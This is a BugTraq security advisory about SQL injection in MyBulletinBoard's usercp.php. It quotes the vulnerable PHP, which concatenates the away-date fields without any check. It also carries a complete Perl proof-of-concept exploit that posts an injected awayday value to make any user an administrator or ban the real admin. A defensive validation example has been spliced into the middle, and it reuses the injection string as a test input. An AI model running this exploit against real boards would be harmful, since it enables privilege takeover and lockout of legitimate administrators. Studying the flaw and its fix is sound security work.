BugTraq
SQL-Injection in MyBulletinBoard allows attacker to become a board admin. Oct 26 2005 08:01AM
Animal (cOre xaker ru)
Vendor: www.mybboard.com
Version: 1.00 Preview Release 2, RC4 and maybe prior.
Script: usercp.php
Code:
> if($mybb->input['away'] == "yes" && $mybb->settings['allowaway'] != "no")
> {
> [...]
> $returndate = $mybb->input['awayday']."-".$mybb->input['awaymonth']."-".$mybb->input['awayyear'];
> [...]
> $newprofile = array(
>     "website" => addslashes(htmlspecialchars($mybb->input['website'])),
>     "icq" => intval($mybb->input['icq']),
>     "aim" => addslashes(htmlspecialchars($mybb->input['aim'])),
>     "yahoo" => addslashes(htmlspecialchars($mybb->input['yahoo'])),
>     "msn" => addslashes(htmlspecialchars($mybb->input['msn'])),
>     "birthday" => $bday,
>     "away" => $away,
>     "awaydate" => $awaydate,
>     "returndate" => $returndate, // <--- not checked (bday too, but anyway)
>     "awayreason" => addslashes(htmlspecialchars($mybb->input['awayreason']))
> );
> [...]
> $db->update_query(TABLE_PREFIX."users", $newprofile, "uid='".$mybb->user['uid']."'");
So an attacker can replace the "awayday" parameter with SQL code and change any
field in the _users table: the three away-date fields are concatenated into
$returndate without any check and then written by update_query().
Changing "usergroup" for his "uid" to 4 makes him an admin. To use
this bug the attacker has to be a registered or awaiting-activation user.
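
The defensive fix for the usercp.php fragment quoted above, as an added example that is not MyBB's own code: each away-date field is accepted only as a digit string within range, so the value that ends up in $returndate can never carry a quote or SQL. The function names, $input and the two constructed request arrays are assumptions for illustration; the script assumes PHP 7 or later.

```php
<?php
// Added example, not MyBB's own code: the away-date fields are validated before
// they reach $newprofile, so submitted text can never alter the UPDATE statement.
// strict_int(), build_returndate(), build_away_profile() and $input are
// hypothetical names used only for this illustration.

// Accept only a string of digits within [$min, $max]; anything else is rejected
// outright rather than silently coerced, so a quote or SQL fragment never passes.
function strict_int($raw, $min, $max)
{
    if (!is_string($raw) || !ctype_digit($raw)) {
        return null;
    }
    $n = intval($raw);
    return ($n >= $min && $n <= $max) ? $n : null;
}

function build_returndate(array $input)
{
    $day   = strict_int($input['awayday']   ?? '', 1, 31);
    $month = strict_int($input['awaymonth'] ?? '', 1, 12);
    $year  = strict_int($input['awayyear']  ?? '', 1970, 2100);
    // checkdate() additionally rejects impossible combinations such as 31-2-2009.
    if ($day === null || $month === null || $year === null || !checkdate($month, $day, $year)) {
        return null;
    }
    // Only digits and dashes can reach the stored value.
    return sprintf('%d-%d-%d', $day, $month, $year);
}

// Hardened counterpart of the original $newprofile fragment: every value is a
// validated integer or an escaped string, never raw request text.
function build_away_profile(array $input)
{
    $returndate = build_returndate($input);
    if ($returndate === null) {
        return null;   // caller refuses the update and re-shows the form
    }
    return array(
        'away'       => (($input['away'] ?? '') === 'yes') ? 'yes' : 'no',
        'returndate' => $returndate,
        'awayreason' => addslashes(htmlspecialchars($input['awayreason'] ?? '')),
    );
}

// Constructed inputs: a normal submission, and one carrying a quote and SQL in
// awayday as in the advisory; the second is refused before any query is built.
$good = array('away' => 'yes', 'awayday' => '1', 'awaymonth' => '1', 'awayyear' => '2009', 'awayreason' => 'holiday');
$bad  = array('away' => 'yes', 'awayday' => "1', usergroup='4' /*", 'awaymonth' => '1', 'awayyear' => '2009');
var_dump(build_away_profile($good) !== null, build_away_profile($bad) === null);
```

Run with the PHP CLI: build_away_profile() returns the sanitised array for the first input and null for the second, so a malformed date never reaches $db->update_query().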

Proof of concept: (For PR2 only)
--<-->--<-->--<-->--<-->--<-->--[START]--<-->--<-->--<-->--<-->--<-->--
#!/usr/bin/perl

### MyBB Preview Release 2 SQL-Injection PoC ExPlOiT ###
### ------------------------------------------------ ###
### To use this you have to be registered member on  ###
### a target.                                        ###
### ------------------------------------------------ ###
### Glossary:                                        ###
###   [MYBBUSER] - name of the field in cookie;      ###
###   [YOUR_ID] - your uid :)                        ###
###   [ID] - victim uid                              ###
### Available groups:                                ###
###   1 - Unregistered / Not Logged In               ###
###   2 - Registered                                 ###
###   3 - Super Moderators                           ###
###   4 - Administrators                             ###
###   5 - Awayting Activation                        ###
###   6 - Moderators                                 ###
###   7 - Banned                                     ###
### ------------------------------------------------ ###
### Examples:                                        ###
### 1) TROUBLE --> U need an admin privileges.       ###
###    USAGE --> mybbpr2.pl -u [MYBBUSER] -i         ###
###    [YOUR_ID] -g 4 server /mybb/                  ###
### 2) TROUBLE --> U need to ban real admin.         ###
###    USAGE --> mybbpr2.pl -u [MYBBUSER] -i         ###
###    [ID] -g 7 server /mybb/                       ###

use IO::Socket;

# Walk the argument list by hand; the last two arguments are SERVER and PATH.
$tmp=0;

while($tmp<@ARGV)
{
    if($ARGV[$tmp] eq "-u")
    {
        $mbuser=$ARGV[$tmp+1];
        $tmp++;
    }
    if($ARGV[$tmp] eq "-i")
    {
        $id=$ARGV[$tmp+1];
        $tmp++;
    }
    if($ARGV[$tmp] eq "-g")
    {
        $ugr=$ARGV[$tmp+1];
        $tmp++;
    }
    if($ARGV[$tmp] eq "-h")
    {
        &f_help();
    }
    $tmp++;
}

$target=$ARGV[@ARGV-2];
$path  =$ARGV[@ARGV-1];

if(!$mbuser || !$id || !$ugr)
{
    &f_die("Some options aren't specified");
}
print "\r\n Attacking http://$target\r\n";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$target",
    PeerPort => "80") || &f_die("Can't connect to $target");

# Form body of the usercp.php profile update; awayday carries the injection.
$str="bday1=&bday2=&bday3=&website=&fid3=Undisclosed&fid1=&fid2=&usertitle=&icq=&aim=&msn=&yahoo=".
     "&away=yes&awayreason=Hacking+The+World".
     "&awayday=1-1-2009%27%2C+usergroup=%27$ugr%27+WHERE+uid=%27$id%27+%2F%2A".
     "&awaymonth=1&awayyear=2009&action=do_profile&regsubmit=Update+Profile";

print $sock "POST $path/usercp.php HTTP/1.1\nHost: $target\nAccept: */*\n".
            "Cookie: mybbuser=$mbuser\nConnection: close\n".
            "Content-Type: application/x-www-form-urlencoded\n".
            "Content-Length: ".length($str)."\n\n$str\n";
while(<$sock>)
{
    if (/Thank you/i) { print "\r\n Looks like successfully exploited\r\n Just check it.\r\n"; exit(0)}
}
print "\r\n Looks like exploit failed :[\r\n";

#----------------------------------#
#     S u B r O u T i N e          #
#----------------------------------#

sub f_help()
{
    print q(
Usage: mybbpr2.pl <OPTIONS> SERVER PATH
Options:
  -u USERKEY  mybbuser field from cookie.
  -i UID      User's uid. (Change group 4 this user)
  -g GROUP    New usergroup. (1-7)
  -h          Displays this help.
);
    exit(-1);
}
#'
sub f_die($)
{
    print "\r\nERROR: $_[0]\r\n";
    exit(-1);
}
--<-->--<-->--<-->--<-->--<-->--[EoF]--<-->--<-->--<-->--<-->--<-->--

Found: 1-3 Sept 2005. Don't remember.
Updated package is available (I hope).

ByE.
